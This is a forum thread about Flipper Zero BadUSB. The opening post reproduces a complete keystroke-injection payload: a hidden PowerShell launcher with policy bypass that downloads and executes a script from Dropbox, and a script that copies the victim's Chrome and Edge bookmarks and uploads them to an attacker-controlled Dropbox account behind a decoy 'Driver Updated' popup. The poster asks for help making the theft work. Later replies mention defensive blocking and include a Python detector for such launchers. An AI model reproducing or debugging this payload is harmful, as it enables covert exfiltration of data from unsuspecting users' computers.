Configuring Dropbox for BadUSB

Hello,

I’ve never used Dropbox and I don’t know if I’m doing things wrong for my file configuration + API token doesn’t seem to work in the scripts.

For this script (payload.txt) :

REM     Title: Bookmark-Hog

REM     Author: atomiczsec

REM     Description: This payload is meant to exfiltrate bookmarks to the rubber ducky

REM     Target: Windows 10, 11

DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr https://www.dropbox.com/scl/fi/XXXXXXXXX/flipper.paper?dl=1&rlkey=XXXXXXXXXXXXdl=1; iex $pl
ENTER

REM     Remember to replace the link with your DropBox shared link for the intended file to download
REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

BH.ps1 :

#Bookmark-Hog

# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf

#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
     try {
         Write-Host "The chrome bookmark file has not been found. "
     }
     catch {
         throw $_.Exception.Message
     }
 }
 # Copy Chrome Bookmarks to Bash Bunny
  else {
     $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt"
     Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1" 
 }

# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf

#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
    try {
        Write-Host "The edge bookmark file has not been found. "
    }
    catch {
        throw $_.Exception.Message
    }
}
 # Copy Chrome Bookmarks to Bash Bunny
 else {
    $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt"
    Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2" 
}

function DropBox-Upload {

    [CmdletBinding()]
    param (
        
    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
    [Alias("f")]
    [string]$SourceFilePath
    ) 
    $DropBoxAccessToken = "XXXXXXXXXXX"   # Replace with your DropBox Access Token
    $outputFile = Split-Path $SourceFilePath -leaf
    $TargetFilePath="/$outputFile"
    $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
    $authorization = "Bearer " + $DropBoxAccessToken
    $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
    $headers.Add("Authorization", $authorization)
    $headers.Add("Dropbox-API-Arg", $arg)
    $headers.Add("Content-Type", 'application/octet-stream')
    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
    }

DropBox-Upload -f "$env:tmp/$F1"
DropBox-Upload -f "$env:tmp/$F2"

$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)

I did create a file on my Dropbox, copied the link and pasted it into the payloads: Dropbox - Invalid Link

And I created an API and copied the APP SECRET code (maybe you need to put the APP KEYS?), I tried it and it didn’t change.

The script outputs no errors, but the file receives nothing.

1 Like

You may find someone here to help you but you would find much better help somewhere else. May I suggest you try the I am Jakoby Discord? If your goal is to do BadUSB stuff that’s the community for you. He also has a GitHub with a Flipper section.

Absolutely love IamJacoby to death but I haven’t been able to get most of his more advanced codes to work. Things like the ADV - Recons and Credz-plz I haven’t been able to figure out although they should be plug and play.

I don’t like IAmJacoby (in this context). I know, very unpopular.

He is writing clear PS and knows what he is doing. But when it comes to BadUSB, most (all?) scripts I have seen are like ‘download payload, execute’ …
Many companies I worked for are blocking Dropbox, WeTransfer, OneDrive by default. If I see these scripts, I think for a good reason.

After seeing these scripts I would adjust my IDS and not drop these attempts; I would forward them to deeper analysis.

So, because you are very limited in details, I would suggest, If the payload is available manual, and don’t blame BadUSB too soon.

2 Likes
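The triage idea from the post above (send these one-liners to deeper analysis instead of silently dropping them), as an added example that is not part of the thread. It scores process-creation events on the traits of the launcher quoted in the first post; the field names follow Sysmon process-creation events, and the sample events, host list and thresholds are constructed assumptions.

```python
import re

# Hosts of the file-sharing services named in the thread; this list is an
# assumption and should follow local policy.
SHARING = re.compile(r"\b(dropbox|dropboxapi|wetransfer|1drv|onedrive)\.", re.I)

# Traits of the one-liner quoted in the first post. PowerShell accepts
# abbreviated parameter names, so each pattern matches the short forms too.
TRAITS = {
    "hidden_window": re.compile(r"\s-w\w*\s+h", re.I),
    "no_profile": re.compile(r"\s-nop\w*", re.I),
    "non_interactive": re.compile(r"\s-noni\w*", re.I),
    "policy_bypass": re.compile(r"\s-e[px]\w*\s+bypass", re.I),
    "web_download": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod)\b", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}

def triage(event):
    """Return (verdict, matched traits) for one process-creation event."""
    cmd = event["CommandLine"]
    hits = [name for name, rx in TRAITS.items() if rx.search(cmd)]
    cradle = "web_download" in hits and "invoke_expression" in hits
    # explorer.exe as parent is what a Run-dialog (GUI r) launch looks like.
    if event["ParentImage"].lower().endswith("\\explorer.exe"):
        hits.append("parent_explorer")
    if cradle and (SHARING.search(cmd) or "hidden_window" in hits):
        return "escalate", hits   # forward to deeper analysis
    if len(hits) >= 3:
        return "review", hits
    return "pass", hits

# Constructed sample events; the first reuses the launcher from the first post.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w h -NoP -NonI -ep Bypass $pl = iwr "
                    "https://www.dropbox.com/scl/fi/XXXXXXXXX/flipper.paper?dl=1; iex $pl"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoP -NonI -ep Bypass -File C:\Temp\setup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev))
```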

His payloads would be much more usable if they didn’t require the downloads. The easy solution would be if the Flipper could act as storage. Maybe a feature of Flipper One? If I had a PowerShell question he would be high on my list of people to ask.

In fact, it can.

Here are two different approaches:

  1. Use the Flipper’s SPI and just leave BadUSB after executing the script.
  2. Use a prepared USB stick (add a file/folder at the root or a defined path) and insert it before or after the BadUSB payload is executed.

There is a more detailed discussion in this thread: Anyway to save files back to the Flipper using BadUSB? - #9 by emptythevoid

1 Like

We should make a generic template for entering a ps1 file’s contents in-line into a PowerShell command to save it to a file. Slow, if long, but might avoid the download. I’m not sure how to use the Flipper CLI to access a file already stored on the device.

Unless the SD storage could be interfaced directly over the serial connections on the GPIO outside of BadUSB somehow.

Edit: I’ve not tried reading data via the Flipper’s CLI. Adding to research list.

1 Like

You can read and write data in Flipper’s internal memory or SD card via CLI; it is storage read /.../path/to/file and storage write /.../path/to/file in simplest form, with int or ext for ... meaning internal and SD respectively.

1 Like

But simple storage write is not available during BadUSB. That is the reason why we all put some thought into this.

1 Like

I wonder if an app could switch between modes. Data transfer would be slow but I suspect it would be worth it if you needed a small binary. The Flipper isn’t the best tool for this but it would be cool to extend its capabilities as a multi-tool. If MacGyver was still around he might have a Flipper next to his Swiss Army knife.